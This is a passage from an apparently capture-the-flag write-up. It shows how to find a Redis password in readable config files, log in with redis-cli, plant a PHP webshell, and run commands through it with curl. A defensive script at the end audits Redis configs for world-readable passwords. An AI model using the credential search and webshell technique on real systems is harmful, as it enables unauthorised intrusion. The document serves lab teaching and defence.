![f0ccb3f7478a42d53991ee05538f7424.png](769c59152c844e42919d614c95feb2d8.png)

Let's see if the CLI is available:

`redis-cli`

![82a65880b0adfd44482e5a89d64f7fc9.png](0c70a2303e294ff5bd6c10500eefd363.png)

It is, but we need to auth. I don't really want to go the curl route, so let's see if we can find some creds.

`find / -name '*.conf' 2>/dev/null | grep redis`

![ecab58ed93ef8a72aa4ba593ed2616d3.png](7105a6dd6c60414ababf18899af26642.png)

![8fcf0726bc694541d3dd249f1f8db43d.png](a4df041b4ef546258326e3903fa71ba7.png)

Nice. Back to the CLI.

![70225906f664490e0990b8c0b7587e30.png](79f89b8b77bc41d3a979f5932491a1f0.png)

Now that we're authenticated, we can try getting RCE.

![a73fa0c17772e253b57aab623dfe5d68.png](aebffc4de04546a8b0d25d9ec2868617.png)

That should give us a very basic webshell that we can curl.

`curl 'http://localhost/rce.php?cmd=ls' --output -`

![76cbb1aadc871689100db9a51801fa36.png](2e208eec6eeb4613ad0d3abc38f5557e.png)

It's a mess, but it works. We can see `maintenance.php`, our `rce.php` and `index.php`. The challenge wanted us to read `index.php`.

`curl 'http://localhost/rce.php?cmd=cat+index.php' --output -`

![13ef2ac235dc36cd5173654e14f45c00.png](aa1e2a4d47404c7089094fe814310f6f.png)

Andddd that's all it wanted.
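
The credential hunt above worked because a Redis config file holding the password was readable from our shell. As an added example (not part of the original writeup or the challenge), here is the same `find ... | grep redis` search turned into a defender's audit. The function names are hypothetical, and it assumes the password sits in a `requirepass` or `masterauth` directive, which are the Redis directives that store it in plaintext.

```shell
#!/bin/sh
# Added example: report Redis config files that contain a plaintext password
# directive and are readable by every local user.

# has_live_secret FILE -> 0 if an uncommented requirepass/masterauth has a value.
# Directive names are matched case-insensitively; commented-out lines are ignored.
has_live_secret() {
    grep -Eiq '^[[:space:]]*(requirepass|masterauth)[[:space:]]+[^[:space:]]' "$1"
}

# world_readable FILE -> 0 if the "other" read bit (mode 004) is set.
# Checks the mode bits, so the answer is the same when the audit runs as root.
world_readable() {
    [ -n "$(find "$1" -prune -perm -004 2>/dev/null)" ]
}

# audit_redis_confs ROOT -> one line per matching file:
#   "EXPOSED <path>"  password present and file world-readable
#   "OK <path>"       no live password, or file not world-readable
audit_redis_confs() {
    find "$1" -type f -name '*.conf' 2>/dev/null | grep -i redis |
    while IFS= read -r conf; do
        if has_live_secret "$conf" && world_readable "$conf"; then
            printf 'EXPOSED %s\n' "$conf"
        else
            printf 'OK %s\n' "$conf"
        fi
    done
}

# Run against a directory when one is given on the command line.
if [ "$#" -gt 0 ]; then
    audit_redis_confs "$1"
fi
```

Any `EXPOSED` line is a file to restrict to the Redis service account (for example mode 640 with a dedicated owner and group), followed by a password rotation.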